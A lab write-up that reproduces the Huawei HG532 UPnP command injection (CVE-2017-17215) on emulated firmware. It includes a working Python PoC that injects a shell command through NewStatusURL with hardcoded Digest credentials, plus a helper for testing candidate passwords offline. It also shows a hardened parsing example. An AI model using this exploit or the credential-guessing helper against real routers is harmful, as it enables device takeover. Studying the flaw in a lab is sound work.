Firmware acquisition
https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/HUAWEI/CVE-2017-17215/firmware
Extraction
binwalk -Mer HG532eV100R001C01B020_upgrade_packet.bin
(-M recurses into whatever gets carved out, -e extracts, -r deletes the carved files once extracted; the root filesystem ends up as a squashfs-root directory under the _HG532eV100R001C01B020_upgrade_packet.bin.extracted folder.)
Starting qemu-system
sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic
The kernel and disk image are the Debian wheezy MIPS (malta/4kc) ones. The order matters: do the bridge and tap0 setup from the next section before launching QEMU, so that the tap0 named here (script=no, so QEMU does no setup of its own) is the one already attached to Virbr0.
Transferring files
On the host, create a bridge and a tap device for the guest:
sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.153.1/24 up
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.153.11/24 up
sudo brctl addif Virbr0 tap0
In the guest (on the QEMU console), bring up eth0:
ifconfig eth0 192.168.153.2/24 up
Then copy the extracted root filesystem in from the host:
scp -r squashfs-root/ root@192.168.153.2:~/
Starting the firmware
# in the guest: bind-mount dev and proc into the extracted rootfs, then chroot into it
mount -o bind /dev ./squashfs-root/dev
mount -t proc /proc ./squashfs-root/proc
chroot squashfs-root/ /bin/sh
Then open a second terminal into the guest over ssh, enter the same chroot, and start the firmware's upnp daemon and mic from inside it:
ssh root@192.168.153.2
chroot squashfs-root /bin/sh
upnp
mic
At this point the guest's addresses get changed (a br0 interface appears); set them back from the QEMU console:
ifconfig eth0 192.168.153.2/24 up
ifconfig br0 192.168.153.11/24 up
Note that 192.168.153.11 is also the address assigned to tap0 on the host side above, so br0 ends up sharing it.
Not sure why the browser cannot reach the device, but the PoC gets through.
POC
import requests

# Precomputed HTTP Digest credentials for the UPnP endpoint, taken from the
# public PoC; the field values are in the RFC 2617 quoted-string form.
headers = {
    "Authorization": 'Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"'
}
# SOAP body for the u:Upgrade action; the injected shell command sits in
# NewStatusURL (here it only creates a directory named "hell", which can be
# checked for from the guest shell afterwards).
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;mkdir hell;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''
r = requests.post('http://192.168.153.2:37215/ctrlt/DeviceUpgrade_1', headers=headers, data=data)
print(r.status_code, r.text)
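The Authorization header in the PoC is a precomputed HTTP Digest (RFC 2617, algorithm=MD5, qop=auth) response for the fixed nonce/cnonce pair shown. The following is an added example, not part of the original page or of the PoC: it shows how that response value is derived, parses the PoC's header (quoted or unquoted values), rebuilds a header for a different server-issued nonce or URI, and tests whether a candidate password reproduces the hardcoded response. The page does not state the credential behind the header and neither does this code; the password in the RFC 2617 test vector ("Circle Of Life") is the RFC's own example, and POC_AUTH is copied from the PoC above.

```python
import hashlib
import re

# The Authorization header exactly as the PoC above sends it.
POC_AUTH = ('Digest username="dslf-config", realm="HuaweiHomeGateway", '
            'nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", '
            'response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", '
            'nc=00000001, cnonce="248d1a2560100669"')


def parse_digest(header):
    """Parse 'Digest k=v, k="v", ...' into a dict; quotes are optional."""
    scheme, _, params = header.partition(" ")
    if scheme != "Digest":
        raise ValueError("not a Digest header")
    pairs = re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', params)
    return {k: v.strip('"') for k, v in pairs}


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """RFC 2617 response for algorithm=MD5 with qop=auth:
    MD5(HA1:nonce:nc:cnonce:qop:HA2), HA1 = MD5(user:realm:pass), HA2 = MD5(method:uri)."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def password_matches(header, password, method="POST"):
    """True if `password` reproduces the response field of `header` (offline check)."""
    f = parse_digest(header)
    computed = digest_response(f["username"], f["realm"], password, method, f["uri"],
                               f["nonce"], f["nc"], f["cnonce"], f.get("qop", "auth"))
    return computed == f["response"]


def build_digest_header(username, realm, password, method, uri, nonce, cnonce, nc="00000001"):
    """Build a fresh header, e.g. when the emulated device answers with a nonce
    (401 + WWW-Authenticate) that differs from the PoC's fixed one."""
    resp = digest_response(username, realm, password, method, uri, nonce, nc, cnonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", uri="{uri}", '
            f'response="{resp}", algorithm="MD5", qop="auth", nc={nc}, cnonce="{cnonce}"')


if __name__ == "__main__":
    fields = parse_digest(POC_AUTH)
    print("PoC digest fields:", fields)
    # Candidate password is a placeholder; substitute whatever you want to test.
    print("candidate matches:", password_matches(POC_AUTH, "candidate-password"))
```

The check is purely offline: nothing is sent to the device, so it is safe to iterate candidate credentials against the captured response without touching the UPnP service.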
Vulnerability analysis
The official PoC shows that the vulnerable parameter is NewStatusURL.
The code handling NewStatusURL has to be patched before the decompiler will produce pseudocode for it.
The guess is that a13 is the value passed in from NewStatusURL; it is user-controlled and ends up in a command line unsanitized (the PoC's ";mkdir hell;" relies on ";" acting as a shell separator), which gives arbitrary command execution.
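To make the defect concrete, here is an added example (not code from the page or from the HG532 firmware) that parses the u:Upgrade SOAP action, shows the vulnerable pattern the analysis describes (pasting the two arguments into a shell command line, where the ";" in NewStatusURL becomes a command boundary), and puts the hardened form beside it: allow-list validation of both arguments plus an argv list for subprocess with no shell involved. The "upg -g -U ... -r ..." command template is an assumed stand-in, not the exact command line from the firmware binary; INJECTED_BODY is the PoC's body and BENIGN_BODY is constructed.

```python
import re
import shlex
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UPNP_NS = "urn:schemas-upnp-org:service:WANPPPConnection:1"

# Request body with the same shape as the PoC above.
INJECTED_BODY = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;mkdir hell;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''

# Constructed benign request, as a legitimate upgrade client might send it.
BENIGN_BODY = (INJECTED_BODY
               .replace(";mkdir hell;", "http://192.168.153.1/status")
               .replace("HUAWEIUPNP", "http://192.168.153.1/fw.bin"))


def parse_upgrade_request(body):
    """Return the two argument strings of a u:Upgrade SOAP action."""
    root = ET.fromstring(body)
    action = root.find(f"{{{SOAP_NS}}}Body/{{{UPNP_NS}}}Upgrade")
    if action is None:
        raise ValueError("request carries no u:Upgrade action")
    # The argument elements have no prefix and no default namespace is declared.
    return {
        "NewDownloadURL": action.findtext("NewDownloadURL", default=""),
        "NewStatusURL": action.findtext("NewStatusURL", default=""),
    }


def build_command_vulnerable(args):
    """The defect as the analysis describes it: both arguments are pasted into
    a shell command line. The 'upg' template is an assumption for illustration."""
    return f"upg -g -U {args['NewDownloadURL']} -r {args['NewStatusURL']}"


def shell_commands(cmdline):
    """Split a command line at ; && || | & the way a shell would, returning one
    argv list per command (illustrative, not a full shell grammar)."""
    parts = re.split(r"\s*(?:&&|\|\||[;|&])\s*", cmdline)
    return [shlex.split(p) for p in parts if p.strip()]


# Conservative allow-list for a plain http(s) URL; anything else, including
# every shell metacharacter, is rejected outright.
PLAIN_URL = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[A-Za-z0-9._~%/\-]*)?")


def build_argv_hardened(args):
    """Hardened form: validate both arguments and return an argv list meant for
    subprocess.run(argv) with no shell, so separators in the data can never
    become command boundaries."""
    for name in ("NewDownloadURL", "NewStatusURL"):
        if not PLAIN_URL.fullmatch(args[name]):
            raise ValueError(f"{name}: not a plain http(s) URL: {args[name]!r}")
    return ["upg", "-g", "-U", args["NewDownloadURL"], "-r", args["NewStatusURL"]]


if __name__ == "__main__":
    injected = parse_upgrade_request(INJECTED_BODY)
    print("vulnerable path runs:", shell_commands(build_command_vulnerable(injected)))
    try:
        build_argv_hardened(injected)
    except ValueError as e:
        print("hardened path rejects:", e)
    print("hardened path accepts:", build_argv_hardened(parse_upgrade_request(BENIGN_BODY)))
```

Note that the hardened validator also refuses the literal "HUAWEIUPNP" the PoC sends in NewDownloadURL, since it is not a URL either; the allow-list is deliberately narrow and would be widened only for characters the upgrade client genuinely needs.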
CVE-2017-13772
Firmware acquisition
https://github.com/Vu1nT0tal/IoT-vulhub/tree/master/TP-Link/CVE-2017-13772/firmware